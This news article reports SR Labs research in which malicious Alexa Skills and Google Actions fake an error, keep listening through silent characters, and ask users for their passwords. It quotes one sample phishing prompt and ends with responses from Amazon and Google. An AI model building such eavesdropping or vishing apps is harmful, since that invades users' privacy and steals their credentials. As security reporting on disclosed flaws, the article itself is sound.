The sound of silence is actually the sound of a malicious smart speaker app listening in on you

Researchers find nefarious uses for Google Home and Amazon Alexa devices

Google Home and Amazon Alexa can easily be hacked to eavesdrop on users or extract information by asking questions that appear to come from each smart speaker provider, according to researchers.

Both platforms can be extended by third-party developers. Such apps are called Skills for Alexa and Actions for Google Home. These are invoked by voice commands – "Alexa" or "OK Google" followed by the name for the third-party app.

Is it possible for these third-party applications to be malicious? According to Security Research Labs, it is. The team demonstrated a simple hack, whereby the application appears to give an error message stating that the requested app is not available in that country, but in fact keeps running, listening and potentially recording any speech.

It was possible to prolong this period by giving the system unpronounceable characters, the audio equivalent to a blank space in text. The voice assistant thinks it is still speaking but nothing is audible, and therefore it listens for longer.

Users are vulnerable after hearing a fake error message, the researchers claimed, because they do not think the third-party app is running. Therefore the app can now pretend to be Google or Alexa. The example shows the user being told: "There's a new update for your Alexa device. To start it, please say Start followed by your Amazon password."

Person hides face in shocked anticipation of something horrible. Photo via shutterstock

You know that silly fear about Alexa recording everything and leaking it online? It just happened


In reality, these systems never ask for your password, but just as malicious users pretending to be your bank can call you on the phone and extract security information from some subset of people, the same could be true of a voice app. The researchers call this "vishing" – voice phishing.

A troubling aspect of this demonstration is that the researchers reckon they were able to submit their apps for review by Amazon and Google, and then change their behaviour after successfully passing the review.

"Using a new voice app should be approached with a similar level of caution as installing a new app on your smartphone," said the researchers. A problem, though, is that these apps are not installed as such, but are automatically available.

"What the researchers at SR Labs demonstrate is something security and privacy advocates have been saying for some time: having a device in your home which can listen to your conversations is not a good idea," security analyst Graham Cluley told The Reg. "Amazon and Google shouldn't be so naive as to think that a single check when an app is first submitted is enough to verify that the app is always behaving benignly. More needs to be done to protect users of such devices from privacy-busting apps."

The researchers, who have shared their work with Amazon and Google, suggest a more thorough review process for third-party voice apps, detection of unpronounceable characters, and monitoring for suspicious output such as asking for a password.

It is still early days for voice assistants and concerns to date have been more about data gathering by Amazon and Google than misuse by third-party applications. In reality, a blatant example such as that demonstrated by SR Labs would likely be picked up quickly, but that does not remove the possibility of more subtle misbehaviour.

We asked both Amazon and Google for comment. On Monday, a spokesperson for Amazon told us:

We quickly blocked the skill in question and put mitigations in place to prevent and detect this type of skill behavior and reject or take them down when identified.

On the subject of why a skill was able to continue working even after it was stopped by a customer, Amazon's PR added: "This is no longer possible for skills being submitted for certification. We have put mitigations in place to prevent and detect this type of skill behavior and reject or take them down when identified."

Also, it should no longer be possible to trick people with bogus security updates. "We have put mitigations in place to prevent and detect this type of skill behavior and reject or take them down when identified," the spokesperson continued.

"This includes preventing skills from asking customers for their Amazon passwords. It’s also important that customers know we provide automatic security updates for our devices, and will never ask them to share their password."

Meanwhile Google had this to say about Google Home Actions, its name for add-on apps for the AI assistant: "All Actions on Google are required to follow our developer policies, and we prohibit and remove any Action that violates these policies. We have review processes to detect the type of behavior described in this report, and we removed the Actions that we found from these researchers. We are putting additional mechanisms in place to prevent these issues from occurring in the future." ®

Other stories you might like

  • US weather forecasters triple supercomputing oomph with latest machines
    NOAA makes it rain for General Dynamics IT, HPE, AMD

    Predicting the weather is a notoriously tricky enterprise, but that’s never held back America's National Oceanic and Atmospheric Administration (NOAA).

    After more than two years of development, the agency brought a pair of supercomputers online this week that it says are three times as powerful as the machines they replace, enabling more accurate forecast models.

    Developed and maintained by General Dynamics Information Technology under an eight-year contract, the Cactus and Dogwood supers — named after the fauna native to the machines' homes in Phoenix, Arizona, and Manassas, Virginia, respectively — will support larger, higher-resolution models than previously possible.

    Continue reading
  • Google said to be taking steps to keep political campaign emails out of Gmail spam bin
    Just after Big Tech comes under fire for left and right-leaning message filters

    Google has reportedly asked the US Federal Election Commission for its blessing to exempt political campaign solicitations from spam filtering.

    The elections watchdog declined to confirm receiving the supposed Google filing, obtained by Axios, though a spokesperson said the FEC can be expected to publish an advisory opinion upon review if Google made such a submission.

    Google did not immediately respond to a request for comment. If the web giant's alleged plan gets approved, political campaign emails that aren't deemed malicious or illegal will arrive in Gmail users' inboxes with a notice asking recipients to approve continued delivery.

    Continue reading
  • China is trolling rare-earth miners online and the Pentagon isn't happy
    Beijing-linked Dragonbridge flames biz building Texas plant for Uncle Sam

    The US Department of Defense said it's investigating Chinese disinformation campaigns against rare earth mining and processing companies — including one targeting Lynas Rare Earths, which has a $30 million contract with the Pentagon to build a plant in Texas.

    Earlier today, Mandiant published research that analyzed a Beijing-linked influence operation, dubbed Dragonbridge, that used thousands of fake accounts across dozens of social media platforms, including Facebook, TikTok and Twitter, to spread misinformation about rare earth companies seeking to expand production in the US to the detriment of China, which wants to maintain its global dominance in that industry. 

    "The Department of Defense is aware of the recent disinformation campaign, first reported by Mandiant, against Lynas Rare Earth Ltd., a rare earth element firm seeking to establish production capacity in the United States and partner nations, as well as other rare earth mining companies," according to a statement by Uncle Sam. "The department has engaged the relevant interagency stakeholders and partner nations to assist in reviewing the matter.

    Continue reading

Biting the hand that feeds IT © 1998–2022